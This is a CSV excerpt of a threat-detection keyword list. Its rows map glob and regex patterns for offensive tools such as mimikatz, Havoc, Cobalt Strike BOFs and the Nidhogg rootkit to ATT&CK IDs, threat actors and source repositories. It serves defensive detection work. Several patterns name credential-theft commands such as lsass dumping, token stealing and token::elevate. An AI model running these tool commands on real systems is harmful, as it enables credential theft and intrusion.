"*title logon backdoor*",".{0,1000}title\slogon\sbackdoor.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z","61359"
"*Tkn_Access_Check.ps1*",".{0,1000}Tkn_Access_Check\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","61360"
"*TlRMTVNTUAABAAAABQKIoAAAAAAAAAAAAAAAAAAAAAA=*",".{0,1000}TlRMTVNTUAABAAAABQKIoAAAAAAAAAAAAAAAAAAAAAA\=.{0,1000}","offensive_tool_keyword","ProxyLogon","ProxyLogon exploitation","T1190 - T1210 - T1213 - T1003 - T1059.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","Dispossessor","Exploitation tool","https://github.com/hakivvi/proxylogon","1","0","#base64","N/A","10","1","20","6","2022-04-23T03:21:44Z","2021-03-14T13:04:07Z","61361"
"*TlRMTVNTUAABAAAABYIIAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAAAAAAAAAAwAAAA*",".{0,1000}TlRMTVNTUAABAAAABYIIAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAAAAAAAAAAwAAAA.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","ntlm decoder","10","10","1156","154","2025-03-11T13:58:24Z","2020-09-06T23:02:37Z","61362"
"*TlRMTVNTUAABAAAAMpCI4gAAAAAoAAAAAAAAACgAAAAGAbEdAAAADw==*",".{0,1000}TlRMTVNTUAABAAAAMpCI4gAAAAAoAAAAAAAAACgAAAAGAbEdAAAADw\=\=.{0,1000}","offensive_tool_keyword","NTMLRecon","Enumerate information from NTLM authentication enabled web endpoints","T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001","TA0009 - TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/puzzlepeaches/NTLMRecon","1","0","#base64","N/A","8","1","35","3","2023-08-16T14:34:10Z","2023-08-09T12:10:42Z","61363"
"*TlRMTVNTUAACAAAABgAGADgAAAAFAomih5Y9EpIdLmMAAAAAAAAAAIAAgAA*",".{0,1000}TlRMTVNTUAACAAAABgAGADgAAAAFAomih5Y9EpIdLmMAAAAAAAAAAIAAgAA.{0,1000}","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","N/A","9","2","112","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z","61364"
"*tls-scanner -connect *:*",".{0,1000}tls\-scanner\s\-connect\s.{0,1000}\:.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","61365"
"*TM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACf0hwW27NyRduzckXbs3JFZvzkRdqz*",".{0,1000}TM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACf0hwW27NyRduzckXbs3JFZvzkRdqz.{0,1000}","offensive_tool_keyword","CACTUSTORCH","A JavaScript and VBScript shellcode launcher. This will spawn a 32 bit version of the binary specified and inject shellcode into it.","T1055.011 - T1059.005 - T1059.007","TA0002 - TA0005","N/A","APT32","Exploitation tool","https://github.com/mdsecactivebreach/CACTUSTORCH","1","0","#base64","N/A","8","10","1006","227","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z","61366"
"*tmdb-get-company-names *",".{0,1000}tmdb\-get\-company\-names\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","61372"
"*tmenochet/PowerDump*",".{0,1000}tmenochet\/PowerDump.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","61373"
"*tmp*ciscophones.tgz*",".{0,1000}tmp.{0,1000}ciscophones\.tgz.{0,1000}","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","N/A","9","2","189","35","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z","61376"
"*tmp*lsass_*.dmp*",".{0,1000}tmp.{0,1000}lsass_.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","61377"
"*tmp.pico.sh*",".{0,1000}tmp\.pico\.sh.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","1","N/A","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","61378"
"*Tmprovider.dll*",".{0,1000}Tmprovider\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","1531","425","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z","61379"
"*TMVB6XJWzuz4KsqUCnwxrtooQV9LmP6R4IX62HeQ7OZzhxgsahsxNzf05dJNkntl*",".{0,1000}TMVB6XJWzuz4KsqUCnwxrtooQV9LmP6R4IX62HeQ7OZzhxgsahsxNzf05dJNkntl.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","N/A","10","10","153","23","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z","61380"
"*tNidhoggClient.exe*",".{0,1000}tNidhoggClient\.exe.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","61381"
"*to $LogonPasswords*",".{0,1000}to\s\$LogonPasswords.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","61382"
"*To dump lsass memory using *",".{0,1000}To\sdump\slsass\smemory\susing\s.{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/ShadowDumper","1","0","#content","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","61383"
"*to_powershell.ducky_script*",".{0,1000}to_powershell\.ducky_script.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","61385"
"*toggle_privileges.cna*",".{0,1000}toggle_privileges\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Syscall BOF to arbitrarily add/detract process token privilege rights.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/Toggle_Token_Privileges_BOF","1","1","N/A","N/A","10","10","55","20","2024-07-10T16:20:39Z","2021-09-14T17:47:08Z","61386"
"*toggle_privileges_bof.*",".{0,1000}toggle_privileges_bof\..{0,1000}","offensive_tool_keyword","cobaltstrike","Syscall BOF to arbitrarily add/detract process token privilege rights.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/Toggle_Token_Privileges_BOF","1","1","N/A","N/A","10","10","55","20","2024-07-10T16:20:39Z","2021-09-14T17:47:08Z","61387"
"*Toggle_Token_Privileges_BOF*",".{0,1000}Toggle_Token_Privileges_BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Syscall BOF to arbitrarily add/detract process token privilege rights.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/Toggle_Token_Privileges_BOF","1","1","N/A","N/A","10","10","55","20","2024-07-10T16:20:39Z","2021-09-14T17:47:08Z","61388"
"*ToggleWDigest*",".{0,1000}ToggleWDigest.{0,1000}","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/WdToggle","1","1","N/A","N/A","10","10","219","31","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z","61389"
"*token find-tokens*",".{0,1000}token\sfind\-tokens.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","61391"
"*token impersonate *",".{0,1000}token\simpersonate\s.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","61392"
"*token privs-get*",".{0,1000}token\sprivs\-get.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","61393"
"*token privs-list*",".{0,1000}token\sprivs\-list.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","61394"
"*token steal *",".{0,1000}token\ssteal\s.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","61395"
"*token swapped. Restoring PreviousMode and spawning system shell*",".{0,1000}token\sswapped\.\sRestoring\sPreviousMode\sand\sspawning\ssystem\sshell.{0,1000}","offensive_tool_keyword","POC","Windows Privilege escalation POC exploitation for CVE-2024-49138","T1068 - T1058 - T1203","TA0004","N/A","N/A","Privilege Escalation","https://github.com/emdnaia/CVE-2024-49138-POC","1","0","#content","N/A","9","1","1","0","2025-01-15T01:01:21Z","2025-01-15T02:11:49Z","61396"
"*token* -CreateProcess * -ProcessId *",".{0,1000}token.{0,1000}\s\-CreateProcess\s.{0,1000}\s\-ProcessId\s.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Start new process with token of a specific user. Tokens can be impersonated from other users with a session/running processes on the machine. Most C2 frameworks have functionality for this built-in (such as the Steal Token functionality in Cobalt Strike)","T1110","TA0006","N/A","Black Basta","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","61397"
"*token* -ImpersonateUser -Username *",".{0,1000}token.{0,1000}\s\-ImpersonateUser\s\-Username\s.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Start new process with token of a specific user. Tokens can be impersonated from other users with a session/running processes on the machine. Most C2 frameworks have functionality for this built-in (such as the Steal Token functionality in Cobalt Strike)","T1110","TA0006","N/A","Black Basta","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","61398"
"*token::elevate*",".{0,1000}token\:\:elevate.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","61399"
"*token::whoami*",".{0,1000}token\:\:whoami.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","61400"
"*TokenDump.exe*",".{0,1000}TokenDump\.exe.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","61401"
"*Token-Impersonation -MakeToken -Username *",".{0,1000}Token\-Impersonation\s\-MakeToken\s\-Username\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","61402"
"*Token-Impersonation -MakeToken*",".{0,1000}Token\-Impersonation\s\-MakeToken.{0,1000}","offensive_tool_keyword","Token-Impersonation","Make a Token (local admin rights not required) or Steal the Token of the specified Process ID (local admin rights required)","T1134.001 - T1134.002","TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/Leo4j/Token-Impersonation","1","0","N/A","N/A","8","1","7","3","2024-03-20T17:07:13Z","2023-11-02T10:46:24Z","61403"
"*Token-Impersonation -Rev2Self*",".{0,1000}Token\-Impersonation\s\-Rev2Self.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","61404"
